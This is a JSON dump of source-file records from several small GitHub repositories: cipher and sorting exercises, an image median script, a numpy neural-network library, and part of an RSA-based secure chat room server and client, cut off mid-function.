[ { "alpha_fraction": 0.6353383660316467, "alphanum_fraction": 0.640350878238678, "avg_line_length": 24.774192810058594, "blob_id": "f28ec98960a57395975f23f2a4de49e45d8abc4e", "content_id": "05d4f8c370107c34d21a557e2b37bc1f00149a33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 58, "num_lines": 31, "path": "/caesar.py", "repo_name": "mwickram/LC101_Web_Caesar", "src_encoding": "UTF-8", "text": "import string\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz\"\n\ndef alphabet_position(letter):\n index = alphabet.find(letter.lower())\n return index\n\ndef rotate_character(char, rot):\n encrypted=\"\"\n rot = int(rot)\n if char==chr(32):\n encrypted=chr(32)\n elif char in string.digits:\n encrypted=char\n elif char in string.punctuation:\n encrypted=char\n else:\n index = alphabet_position(char.lower()) + rot\n if index >= len(alphabet):\n index=index%len(alphabet)\n encrypted = alphabet[index]\n if char in string.ascii_uppercase:\n encrypted=encrypted.upper()\n return encrypted\n\ndef encrypt(text,rot):\n encrypted=\"\"\n for char in text:\n encrypted = encrypted + rotate_character(char,rot)\n return encrypted" } ]
1
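A quick usage check for the encrypt helper in the record above (a sketch, assuming the file is importable as caesar; rotation wraps modulo the 26-letter alphabet while case, digits and punctuation pass through unchanged):

from caesar import encrypt

print(encrypt("Hello, World!", 3))   # Khoor, Zruog!
print(encrypt("Khoor, Zruog!", 23))  # rotating by 26 - 3 shifts it back to Hello, World!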
aslanamanzholov/alghoritms_detail
https://github.com/aslanamanzholov/alghoritms_detail
187fcee03ac97947a41181ca3764ccb281ffa6f4
1f2c93d5a6d69d0c9838eac9c457002452839921
10e2c3d798a853e45754c1f2547b64d0973272af
refs/heads/master
2023-08-20T16:12:23.373888
2021-09-24T10:59:14
2021-09-24T10:59:14
286,681,827
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.41025641560554504, "alphanum_fraction": 0.446153849363327, "avg_line_length": 12.928571701049805, "blob_id": "9a257199fefb5a6da4d8d6963f3c7409ead48c6e", "content_id": "1b023e28af47522acc51990626aa9947136917ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 195, "license_type": "no_license", "max_line_length": 31, "num_lines": 14, "path": "/review/min_max.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "def min_max(a, b):\n if a < b:\n a, b = b, a\n if a > b:\n b, a = a, b\n return {\"min\": a, \"max\": b}\n\n\nprint(min_max(12, 12))\n\na = list(range(100))\n\nprint(min(a))\nprint(max(a))\n" }, { "alpha_fraction": 0.4416666626930237, "alphanum_fraction": 0.4833333194255829, "avg_line_length": 16.14285659790039, "blob_id": "af582c745d2c04afc7982c7069ded68ba5a5f999", "content_id": "7e1d0ba26fe124578378c9579f4744e484650904", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "no_license", "max_line_length": 43, "num_lines": 14, "path": "/review/bubble_sort.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "from random import randint\n\nN = 10\na = list()\n\nfor i in range(N):\n a.append(randint(1, 99))\nprint(a)\n\nfor i in range(N - 1):\n for j in range(N - i - 1):\n if a[j] > a[j + 1]:\n a[j], a[j + 1] = a[j + 1], a[j]\nprint(a)\n" }, { "alpha_fraction": 0.4084506928920746, "alphanum_fraction": 0.4647887349128723, "avg_line_length": 9.142857551574707, "blob_id": "3eaebcd50e14e3aba6727711b1d651bc692495a0", "content_id": "96da930e6f661d4548cb9c4ba94571328d69e231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 71, "license_type": "no_license", "max_line_length": 18, "num_lines": 7, "path": "/review/summ_int.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "a = 10\nn = 9\nq = 2\nprint(a)\nfor i in range(n):\n a *= q\n print(a)\n" }, { "alpha_fraction": 0.4318618178367615, "alphanum_fraction": 0.4568138122558594, "avg_line_length": 20.70833396911621, "blob_id": "7716511a952cf521626b9e4a030101418f02f11d", "content_id": "63001f3e6d1c7aa30c1b4e7bdeab6003318dbe8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/review/quick_sort.py", "repo_name": "aslanamanzholov/alghoritms_detail", "src_encoding": "UTF-8", "text": "import random\n\nnumbers = [4, 1, 2, 3, 6, 12, 10, 9, 8, 7]\n\n\ndef quick_sort(numbers):\n if len(numbers) <= 1:\n return numbers\n else:\n q = random.choice(numbers)\n s_nums = []\n m_nums = []\n e_nums = []\n for i in numbers:\n if i < q:\n s_nums.append(i)\n elif i > q:\n m_nums.append(i)\n else:\n e_nums.append(i)\n return quick_sort(s_nums) + e_nums + quick_sort(m_nums)\n\n\nprint(quick_sort(numbers))\n" }, { "alpha_fraction": 0.5034482479095459, "alphanum_fraction": 0.5310344696044922, "avg_line_length": 25.363636016845703, "blob_id": "34752906e700ea0f2ed9848aacadace50b2f0136", "content_id": "db412e2299cc4bc28b3acc8f391f10d1db32c1d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 43, "num_lines": 11, "path": "/review/max_min_from_list.py", "repo_name": "aslanamanzholov/alghoritms_detail", 
"src_encoding": "UTF-8", "text": "def max_min_from_list(l):\n minimum = float('inf')\n maximum = float('-inf')\n for item in l:\n if item < minimum:\n minimum = item\n if item > maximum:\n maximum = item\n return {\"min\": minimum, \"max\": maximum}\n\nmax_min_from_list([1,2,3,4,5,6,7,8])\n" } ]
5
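The quick_sort in the record above partitions three ways around a random pivot, so duplicate values land in e_nums and the recursion terminates. A small property check against the built-in sort, assuming /review/quick_sort.py is importable under the hypothetical module name quick_sort:

import random
from quick_sort import quick_sort  # hypothetical import path

for _ in range(100):
    data = [random.randint(0, 20) for _ in range(30)]
    assert quick_sort(data) == sorted(data)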
kuanb/traffic_img_processor
https://github.com/kuanb/traffic_img_processor
a9c277857a7c7a16ebe1df403167011ccfc2589f
1c3daa95aeee796d58d293c0a87600545abb6c00
04fb3e5abe5dcf48507d9a3c56788f51f9f461ee
refs/heads/master
2016-09-06T18:04:39.351455
2015-09-02T21:52:28
2015-09-02T21:52:28
41,827,065
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.5644567012786865, "alphanum_fraction": 0.581031322479248, "avg_line_length": 29.13888931274414, "blob_id": "bc1bc8270ea28b22982b7294bf0c757a3f490837", "content_id": "f63a8549653e38fe33a9a1182114b68368586473", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1086, "license_type": "no_license", "max_line_length": 90, "num_lines": 36, "path": "/median.py", "repo_name": "kuanb/traffic_img_processor", "src_encoding": "UTF-8", "text": "import cv2\nimport os\nimport numpy\nimport math\n\nallPhotos = []\n\npath = 'imgs/'\nfor fn in os.listdir(path):\n current = path + fn\n if os.path.isfile(current):\n img = cv2.imread(current)\n allPhotos.append(img)\n\n# check that all images are the same size\nif all(x.shape == allPhotos[0].shape for x in allPhotos):\n col = range(allPhotos[0].shape[0]-1)\n row = range(allPhotos[0].shape[1]-1)\n for c in col:\n for r in row:\n eachImageVals = {\"r\": [], \"b\": [], \"g\":[]}\n for img in allPhotos:\n vals = img[c,r]\n eachImageVals[\"r\"].append(vals[0])\n eachImageVals[\"b\"].append(vals[1])\n eachImageVals[\"g\"].append(vals[2])\n for v in eachImageVals:\n eachImageVals[v] = numpy.median(numpy.array(eachImageVals[v]))\n eachImageVals[v] = math.trunc(eachImageVals[v])\n allPhotos[0][c,r] = [eachImageVals[\"r\"],eachImageVals[\"g\"],eachImageVals[\"b\"]]\n\nprint 'finished'\n\ncv2.imshow('image', allPhotos[0])\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n" } ]
1
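The pixel-by-pixel loops in median.py above run in pure Python and, because of range(shape - 1), skip the last row and column; numpy can take the per-channel median of the whole stack in one call. A sketch under the same assumption used there, that every loaded image has an identical HxWx3 shape:

import numpy as np

# allPhotos: list of equally sized HxWx3 uint8 arrays, loaded as in the record above (assumed).
stacked = np.stack(allPhotos)                      # shape (N, H, W, 3)
median_img = np.median(stacked, axis=0).astype(np.uint8)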
vinupriyesh/deeplearning-numpy
https://github.com/vinupriyesh/deeplearning-numpy
1c6064e8403e1dfd24c3180755b67c3bfe7b1d44
57b16a359f097f1abab9cc1fe12a293220092cb4
e56d33951d710b2c10e29293b3d0b54da7439010
refs/heads/master
2021-09-05T19:15:29.044974
2018-01-30T13:29:36
2018-01-30T13:29:36
113,292,288
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6316297054290771, "alphanum_fraction": 0.6586306691169739, "avg_line_length": 25.615385055541992, "blob_id": "bbcf7e35f24d3cf00309497cb7191bfd4ccdf1ab", "content_id": "5f0a4aed2ee61b54a75bcd5b92ce4b23c3fdc641", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1037, "license_type": "permissive", "max_line_length": 50, "num_lines": 39, "path": "/cifar10_reader.py", "repo_name": "vinupriyesh/deeplearning-numpy", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndef unpickle(file):\n\timport pickle\n\twith open(file, 'rb') as fo:\n\t\tdict = pickle.load(fo, encoding='bytes')\n\treturn dict\n\ndef get_all_data():\n\tx,y,names = get_data('data_batch_1')\n\tfor i in range(2,6):\n\t\tx_t,y_t,names_t = get_data('data_batch_'+str(i))\n\t\tx = np.concatenate((x,x_t),axis = 1)\n\t\ty = np.concatenate((y,y_t),axis = 1)\n\t\tnames = np.concatenate((names,names_t),axis = 0)\n\treturn x,y,names\n\ndef get_data(file):\n\tabsFile = os.path.abspath(\"data/\"+file)\n\tdict = unpickle(absFile)\n\tX = np.asarray(dict[b'data'].T).astype(\"uint8\")\n\tYraw = np.asarray(dict[b'labels'])\n\tY = np.zeros((10,10000))\n\tfor i in range(10000):\n\t\tY[Yraw[i],i] = 1\n\tnames = np.asarray(dict[b'filenames'])\n\treturn X,Y,names\n\ndef visualize_image(X,Y,names,id):\n\trgb = X[:,id]\n\timg = rgb.reshape(3,32,32).transpose([1, 2, 0])\n\tplt.imshow(img)\n\tplt.title(names[id])\n\tdir = os.path.abspath(\"output/samples\")\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\tplt.savefig(dir+\"/\"+names[id].decode('ascii'))" }, { "alpha_fraction": 0.6744421720504761, "alphanum_fraction": 0.6866125464439392, "avg_line_length": 35.51852035522461, "blob_id": "67f81f0f8bbcd936d21ce9f7e1926d7b5f291bd1", "content_id": "252f56cdb60b0f38f46739984e95851d44253223", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 986, "license_type": "permissive", "max_line_length": 124, "num_lines": 27, "path": "/README.md", "repo_name": "vinupriyesh/deeplearning-numpy", "src_encoding": "UTF-8", "text": "# deeplearning-numpy\nSimple deeplearning library using numpy only.\n\n## Usage\n\ncall `nn.model` with x and x with keyword parameters\n\n### parameters\n- X : input to the model - (no. of features x no. of samples)\n- Y : output of the model - (no. of classes x no. of samples)\n\n### Keyword parameters\n- **alpha** : Learning Rate \n *default* : 0.01\n- **iter** : Iterations \n*default* : 3000\n- **hidden_layer_dims** : Hidden layer dimentions, also decides the number of hidden layers based on the length of this list\n*default* : [] \n- **activation** : Activation function for the other layers and the last layer as a list of length 2. \n*supports* : sigmoid, tanh, relu, leaky_relu, softmax \n*default* : ['tanh','sigmoid']\n- **batch_size** : Mini batch size \n*default* : X.shape[1]\n- **dev_set_ratio** : Dev set to total data-set ratio. \n*default* : 0.02\n- **parameters_file** : File-name for the parameters file to import incase of using/training a pretrained model. 
\n*default* : None\n" }, { "alpha_fraction": 0.5669013857841492, "alphanum_fraction": 0.5933098793029785, "avg_line_length": 23.69565200805664, "blob_id": "5ee5a83729f94541aa247ad2aa067f1681efbc27", "content_id": "e87b29a88932068a4a7df6c5954861e1eaf27505", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 568, "license_type": "permissive", "max_line_length": 41, "num_lines": 23, "path": "/activations.py", "repo_name": "vinupriyesh/deeplearning-numpy", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef sigmoid(z):\n return 1 / (1 + np.exp(-z))\ndef tanh(z):\n return np.tanh(z)\ndef relu(z):\n return z * (z > 0)\ndef softmax(z):\n e = np.exp(z - np.max(z,axis=0))\n return e/e.sum(axis=0)\ndef leaky_relu(z, epsilon=0.1):\n return np.maximum(epsilon * z, z)\ndef inverse_tanh(z,a):\n return (1-np.power(a,2))\ndef inverse_relu(z,a):\n dz = np.array(z,copy = True)\n dz[z <= 0] = 0\n return dz\ndef inverse_leaky_relu(z,a, epsilon=0.1):\n gradients = 1. * (z > epsilon)\n gradients[gradients == 0] = epsilon\n return gradients\n" }, { "alpha_fraction": 0.6483199000358582, "alphanum_fraction": 0.6661091446876526, "avg_line_length": 30.023584365844727, "blob_id": "2c4bd9bb1c0d3a8ad826e649bbbf329468c994e7", "content_id": "fcdf820aef69e24e61ea3277f30026f5372b69c0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6577, "license_type": "permissive", "max_line_length": 133, "num_lines": 212, "path": "/nn.py", "repo_name": "vinupriyesh/deeplearning-numpy", "src_encoding": "UTF-8", "text": "import numpy as np\nimport activations as af\nimport datetime\nimport sys\nimport matplotlib.pyplot as plt\nimport os\n\n\ndef log(str):\n\ttm = datetime.datetime.now().strftime(\"%I:%M:%S %p\")\n\tprint(\"{} -> {}\".format(tm,str))\n\ndef init_parameters(layer_dims,parameters_file):\n\tif parameters_file == None:\n\t\treturn init_parameters_new(layer_dims)\n\tlog(\"Reusing the parameter from {}\".format(parameters_file))\n\tparameters = np.load(parameters_file)\n\tlog(type(parameters))\n\tlog(parameters[()]['W1'].shape)\n\treturn parameters[()]\ndef init_parameters_new(layer_dims):\n\tparameters = {}\n\tL = len(layer_dims)\n\tfor l in range(1, L):\n\t\tparameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) / np.sqrt(layer_dims[l-1])\n\t\tparameters['b' + str(l)] = np.zeros((layer_dims[l], 1))\n\treturn parameters\n\ndef perform_activation(activation,Z):\n\treturn getattr(sys.modules[\"activations\"],activation)(Z)\n'''\n\tif activation == 'tanh':\n\t\treturn af.tanh(Z)\n\telif activation == 'sigmoid':\n\t\treturn af.sigmoid(Z)\n\telif activation == 'relu':\n\t\treturn af.relu(Z)\n'''\ndef perform_activation_backwards(activation,Z,A):\n\treturn getattr(sys.modules[\"activations\"],\"inverse_\"+activation)(Z,A)\n'''\n\ts = perform_activation(activation,z)\n\tdZ = dA * s * (1-s)\n\treturn dZ\n'''\n\ndef update_grads(grads,parameters,alpha):\n\tL = len(parameters) // 2\n\tfor l in range(1,L+1):\n\t\tparameters['W' + str(l)] = parameters['W' + str(l)] - alpha * grads['dW' + str(l)]\n\t\tparameters['b' + str(l)] = parameters['b' + str(l)] - alpha * grads['db' + str(l)]\n\treturn parameters #have to check whether this is really reqd\n\ndef back_prop(m,A_values,Z_values,Y,activation,parameters):\n\tgrads = {}\n\tdZ = A_values[-1] - Y\n\tL = len(A_values)-1\n\tfor l in reversed(range(L)):\n\t\tgrads['dW' + str(l + 1)] = (1 / m) * np.dot(dZ,A_values[l].T)\n\t\tgrads['db' + 
str(l + 1)] = (1 / m) * np.sum(dZ,axis=1,keepdims=True)\n\t\tif l != 0:\n\t\t\tdZ = np.dot(parameters['W' + str(l+1)].T,dZ)\n\t\t\tdZ *= perform_activation_backwards(activation[0],Z_values[l-1],A_values[l])\n\treturn grads\n\ndef forward_prop(X,activation,parameters):\n\tA_values = []\n\tZ_values = []\n\tL = len(parameters) // 2\n\tA = X\n\tA_values.append(A)\n\tfor l in range(1,L):\n\t\tZ = np.dot(parameters['W' + str(l)],A) + parameters['b' + str(l)]\n\t\tA = perform_activation(activation[0],Z)\n\t\tA_values.append(A)\n\t\tZ_values.append(Z)\n\tZ = np.dot(parameters['W' + str(L)],A) + parameters['b' + str(L)]\n\tA = perform_activation(activation[1],Z)\n\tA_values.append(A)\n\tZ_values.append(Z)\n\treturn A_values,Z_values\n\ndef validate (Y,Y1,m):\n\tsucc = 0\n\tfor i in range(m):\n\t\tif(np.sum(Y[:,i] == Y1[:,i]) == 10):\n\t\t\tsucc+=1\n\treturn succ/m\n\ndef predict(m,A2):\n\tY = np.zeros((10, m))\n\tfor i in range(m):\n\t\tmax_val = 0\n\t\tmax_val_id = 0\n\t\tfor j in range(10):\n\t\t\tif A2[j,i] > max_val :\n\t\t\t\tmax_val_id = j\n\t\t\t\tmax_val = A2[j,i]\n\t\tY[max_val_id,i] = 1\n\treturn Y\n\ndef get_batch(X,Y,m,X_current_batch,Y_current_batch,batch_size,batch_cursor,epoch):\n\tX_current_batch[:,0:batch_size] = X[:,batch_cursor:batch_cursor+batch_size]\n\tY_current_batch[:,0:batch_size] = Y[:,batch_cursor:batch_cursor+batch_size]\n\tif batch_cursor + 2*batch_size >= m:\n\t\tbatch_cursor = 0\n\t\tepoch+=1\n\telse:\n\t\tbatch_cursor += batch_size\n\treturn X_current_batch,Y_current_batch,batch_cursor,epoch\n\ndef compute_cost(y_hat,Y,m,train_cost,train_accu):\n\tlogprobs = np.multiply(np.log(y_hat), Y) + np.multiply((1 - Y), np.log(1 - y_hat))\n\tcost = - np.sum(logprobs) / m\n\ttrain_cost.append(cost)\n\tY2 = predict(m,y_hat)\n\taccu = validate(Y,Y2,m)\n\ttrain_accu.append(accu)\n\treturn cost\n\ndef compute_dev_set(X,Y,m,activation,parameters,dev_accu):\n\tA_values,Z_values = forward_prop(X,activation,parameters)\n\tY2 = predict(m,A_values[-1])\n\taccu = validate(Y,Y2,m)\n\tdev_accu.append(accu)\n\treturn accu\n\ndef model(X,Y,**kwargs):\n\tlog(\"Entered model with {}\".format(kwargs))\n\tlog(\"X size : {}, Y size : {}\".format(X.shape,Y.shape))\n\t\n\tx_n,m = X.shape\n\ty_n = len(Y)\n\t\n\talpha = kwargs.get('alpha',0.01)\n\titer = kwargs.get('iter',3000)\n\tlayer_dims = kwargs.get('hidden_layer_dims',[])\n\tactivation = kwargs.get('activation',['tanh','sigmoid'])\n\tbatch_size = kwargs.get('batch_size',m)\n\tdev_set_ratio = kwargs.get('dev_set_ratio',0.02)\n\tparameters_file = kwargs.get('parameters_file',None)\n\t\n\tlayer_dims.insert(0,x_n)\n\tlayer_dims.insert(len(layer_dims),y_n)\n\n\tparameters = init_parameters(layer_dims,parameters_file)\n\tlog(len(parameters))\n\titerations_capture_freq = 50\n\tcapture_frequency = 500\n\taccu = 0\n\ttrain_cost = []\n\ttrain_accu = []\n\tdev_accu = []\n\tbatch_cursor = 0\n\tepoch = 0\n\tX_current_batch = np.zeros([x_n,batch_size])\n\tY_current_batch = np.zeros([y_n,batch_size])\n\tm_dev = int(m*dev_set_ratio)\n\tm = m - m_dev\n\tX,X_dev = np.split(X,[m],axis=1)\n\tY,Y_dev = np.split(Y,[m],axis=1)\n\tlog(\"Post splitting of train and dev set, shape of train : {} , dev : {}\".format(X.shape,X_dev.shape))\n\tprint(\"Training the model, please wait\")\n\tprint(\"00.00% cost: 00.0000 accu: 0.0000\",end=\"\")\n\tfor i in range(iter):\n\t\tX_current_batch,Y_current_batch,batch_cursor,epoch = get_batch(X,Y,m,X_current_batch,Y_current_batch,batch_size,batch_cursor,epoch)\n\t\tA_values,Z_values = 
forward_prop(X_current_batch,activation,parameters)\n\t\tif(i%iterations_capture_freq==0):\n\t\t\tcost = compute_cost(A_values[-1],Y_current_batch,batch_size,train_cost,train_accu)\n\t\t\tif m_dev >0:\n\t\t\t\taccu = compute_dev_set(X_dev,Y_dev,m_dev,activation,parameters,dev_accu)\n\t\t\tprint(\"\\b\"*35,end=\"\")\n\t\t\tprint(\"{:05.2f}% cost: {:07.4f} accu: {:06.4f}\".format((i/iter*100),cost,accu),end=\"\",flush=True)\n\t\t\t\t#log('dev acc : {}'.format(accu))\n\t\tgrads = back_prop(batch_size,A_values,Z_values,Y_current_batch,activation,parameters)\n\t\tparameters = update_grads(grads,parameters,alpha)\n\t\tif i%capture_frequency == 0 and i!=0:\n\t\t\tsnapshot(train_cost,train_accu,dev_accu,parameters,i)\n\tprint(\"\")\n\tif m_dev >0:\n\t\taccu = compute_dev_set(X_dev,Y_dev,m_dev,activation,parameters,dev_accu)\n\tsnapshot(train_cost,train_accu,dev_accu,parameters,i)\n\tlog(\"Model ready with accuracy : {}\".format(accu))\n\treturn parameters\n\ndef snapshot(train_cost,train_accu,dev_accu,parameters,i):\n\tplt.clf()\n\tdir = os.path.abspath(\"output/snapshots\")\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\tnp.save(os.path.join(dir, 'parameters'+str(i)),parameters)\n\t#cost graph\n\tplt.subplot(3,1,1)\n\tplt.grid(True)\n\tay = plt.gca()\n\tay.set_yscale('log')\n\tplt.plot(train_cost)\n\tplt.title(\"Cost graph\")\n\t\n\t#train accu\n\tplt.subplot(3,1,2)\n\tplt.grid(True)\n\tplt.plot(train_accu)\n\tplt.title(\"Training accuracy\")\n\t\n\t#dev accu\n\tplt.subplot(3,1,3)\n\tplt.grid(True)\n\tplt.plot(dev_accu)\n\tplt.title(\"Dev set accuracy\")\n\tplt.savefig(dir+\"/graph\"+str(i)+\".png\")\n\tplt.close()\n" } ]
4
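A hypothetical call matching the README's keyword parameters in the record above (shapes follow its features x samples convention; the dimensions and random data here are made up, and the 10-row one-hot Y matches the 10 classes the library's predict/validate helpers assume):

import numpy as np
import nn  # the repo's nn.py

X = np.random.rand(3072, 1000)   # 3072 features x 1000 samples (assumed)
Y = np.zeros((10, 1000))         # 10 classes, one-hot encoded per column
Y[np.random.randint(0, 10, 1000), np.arange(1000)] = 1

parameters = nn.model(X, Y, alpha=0.01, iter=500,
                      hidden_layer_dims=[64, 32],
                      activation=['relu', 'sigmoid'],
                      batch_size=100, dev_set_ratio=0.02)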
enathang/SecureChatRoom
https://github.com/enathang/SecureChatRoom
e368d8bafc889370dcda0a4759f4cb431f1929d2
77c4bd16e94d7c6dbdfb0fc33d338a45cc62487d
42ae905da027fe9428830d5accb05c3a2eb07511
refs/heads/master
2020-04-09T05:04:25.534886
2019-06-29T22:37:12
2019-06-29T22:37:12
160,050,153
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6136363744735718, "alphanum_fraction": 0.6227272748947144, "avg_line_length": 39, "blob_id": "d3529fc44ba65d9e71d13e27d229efe7afaba4f5", "content_id": "b51e8efe3a8ff7e98c8a56ef6fbbb3c1a1fe97a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 440, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/gen_keyfiles.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from Cryptodome.PublicKey import RSA\n\nfor usr in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n key = RSA.generate(2048)\n keystr_priv = key.exportKey()\n with open(\"./keys/\" + usr + \"_priv.pem\", \"w\") as prv_file:\n print(\"{}\".format(keystr_priv.decode()), file=prv_file)\n\n keystr_pub = key.publickey().exportKey()\n with open(\"./keys/\" + usr + \"_pub.pem\", \"w\") as pub_file:\n print(\"{}\".format(keystr_pub.decode()), file=pub_file)\n" }, { "alpha_fraction": 0.6779900789260864, "alphanum_fraction": 0.6808209419250488, "avg_line_length": 27.280000686645508, "blob_id": "07f450057f9c01d32fe4498857b58175cee7f73b", "content_id": "b55ef1590d5549a241bd95a580b66ee051d62213", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1413, "license_type": "no_license", "max_line_length": 95, "num_lines": 50, "path": "/client_gui.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from Tkinter import *\nimport interface_functions\n\nimport user \n\nclass client_gui:\n\tclass chat_gui(netif):\n\t\tdef receive(netif):\n\t\t\t\"\"\"Handles receiving of messages.\"\"\"\n\t\t\twhile True:\n\t\t\t\tstatus, enc_msg = netif.receive_msg(blocking=True)\n\n\t\tdef send(event=None): # event is passed by binders.\n\t\t\t\"\"\"Handles sending of messages.\"\"\"\n\t\t\tmsg = my_msg.get()\n\t\t\tmy_msg.set(\"\") # Clears input field.\n\t\t\t## build enc message to send then call send functions\n\n\t\t\tif msg == \"{quit}\":\n \t\t\n \t\ttop.quit()\n\n\n\t\tdef on_closing(event=None):\n\t\t\t\"\"\"This function is to be called when the window is closed.\"\"\"\n \t\tmy_msg.set(\"{quit}\")\n\t\t\tsend()\n\n\t\ttop = tkinter.Tk()\n\t\ttop.title(\"CsippCsapp\")\n\n\t\tmessages_frame = tkinter.Frame(top)\n\t\tmy_msg = tkinter.StringVar() # For the messages to be sent.\n\t\tmy_msg.set(\"Type your messages here.\")\n\t\tscrollbar = tkinter.Scrollbar(messages_frame) # To navigate through past messages.\n\n\t\tmsg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)\n\t\tscrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)\n\t\tmsg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)\n\t\tmsg_list.pack()\n\n\t\tmessages_frame.pack()\n\n\t\tentry_field = tkinter.Entry(top, textvariable=my_msg)\n\t\tentry_field.bind(\"<Return>\", send)\n\t\tentry_field.pack()\n\t\tsend_button = tkinter.Button(top, text=\"Send\", command=send)\n\t\tsend_button.pack()\n\n\t\ttop.protocol(\"WM_DELETE_WINDOW\", on_closing)" }, { "alpha_fraction": 0.59117192029953, "alphanum_fraction": 0.5965307950973511, "avg_line_length": 38.39444351196289, "blob_id": "a4a96e58f778305199ee6c8be0658dc7d1af547f", "content_id": "abcd4576124a76ae12c160c98e1cf2b3e2168784", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7091, "license_type": "no_license", "max_line_length": 113, "num_lines": 180, "path": "/server_func.py", "repo_name": "enathang/SecureChatRoom", "src_encoding": "UTF-8", "text": "from Crypto.Random 
import get_random_bytes\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom Crypto.Signature import PKCS1_PSS\nfrom Crypto.Hash import SHA256\nfrom enum import Enum\nimport sys\nimport user\n\nfrom netinterface import network_interface\nfrom chat_protocol import MsgType\nfrom chat_protocol import MSG_SIGNATURE_SIZE\nimport chat_protocol\nimport random\n\nSERVER_ADDR = b'S'\nDIRTY_MSG_FILE = './dirty_msgs'\nclass Server:\n class ServerState(Enum):\n UNINITIALIZED = 0\n INITIALIZED = 1\n def __init__(self, netif, group_members_fname, keyfile):\n # Read in all group members, and set them to be offline\n self.group_members = {}\n with open(group_members_fname, 'r') as f:\n for line in f:\n self.group_members[line.strip()] = False\n with open(keyfile, 'r') as kfile:\n keystr = kfile.read()\n self.key_pair = RSA.import_key(keystr)\n self.dig_signer = PKCS1_PSS.new(self.key_pair)\n #self.state = self.ServerState.UNINITIALIZED\n self.netif = netif\n self.last_secret_hash = None\n def listen(self):\n while True:\n print('Waiting for msg...')\n status, msg = self.netif.receive_msg(blocking=True)\n self.evaluate_msg(msg)\n\n def evaluate_msg(self, msg):\n print('Evaluating msg...', msg)\n try:\n msg_type = int(msg[:chat_protocol.MSG_TYPE_SIZE])\n print('Message type: ', msg_type)\n except ValueError:\n print('Invalid msg_type received. Dropping message.', file=sys.stderr)\n return\n if not self.validate(msg):\n print('Message did not validate correctly.', file=sys.stderr)\n return\n\n msg_source = msg[1:2].encode('ascii')[0] if type(msg) != bytes else msg[1:2]\n try:\n opts = {\n MsgType.JOIN : self.response_join,\n MsgType.LEAVE : self.response_leave,\n MsgType.MSG : self.response_msg,\n MsgType.SECRET : self.response_secret,\n MsgType.CHALLENGE : self.response_challenge\n }[msg_type](msg, msg_source)\n except KeyError:\n print('Invalid msg_type received. 
Dropping message.', file=sys.stderr)\n return\n\n def destroy(self):\n print('Server resetting...')\n for usr in self.group_members:\n self.group_members[usr] = False\n #self.state = ServerState.UNINITIALIZED\n\n def validate(self, msg):\n print('Validating msg...\\n', msg[:-MSG_SIGNATURE_SIZE])\n try:\n usr = msg[1:2].decode('ascii')\n with open('./keys/' + usr +'_pub.pem', 'r') as usr_kfile:\n usr_kstr = usr_kfile.read()\n usr_key = RSA.import_key(usr_kstr)\n\n usr_sig = msg[-MSG_SIGNATURE_SIZE:]\n verify_signature(msg[:-MSG_SIGNATURE_SIZE], usr_sig, usr_key)\n return True\n except SyntaxError:\n return False\n\n def response_join(self, msg, msg_source):\n print('Responding to join message...')\n self.group_members[msg_source.decode()] = True\n self.send_init(msg_source)\n\n def response_leave(self, msg, msg_source):\n print('Responding to leave message...')\n # We already have verified that the user exists (so no need to check for KeyError)\n try:\n self.group_members[msg_source] = False\n if(len([x for x in self.group_members if self.group_members[x]]) != 0):\n self.destroy()\n new_initiator = random.choice(list(self.group_members))\n self.send_init(new_initiator)\n except KeyError:\n print('key error in leave response -- specified group member not found!', file=sys.stderr)\n return\n\n def response_msg(self, msg, msg_source):\n print('Responding to text message...')\n self.forward_msg(msg, msg_source)\n\n def response_secret(self, msg, msg_source):\n print('Responding to secret message...')\n self.last_secret_hash = SHA256.new(msg).digest()\n with open(DIRTY_MSG_FILE, 'r') as used_file:\n msg_content = used_file.read()\n if(msg_content.find(str(self.last_secret_hash)) != -1):\n return\n with open(DIRTY_MSG_FILE, 'a') as used_file:\n 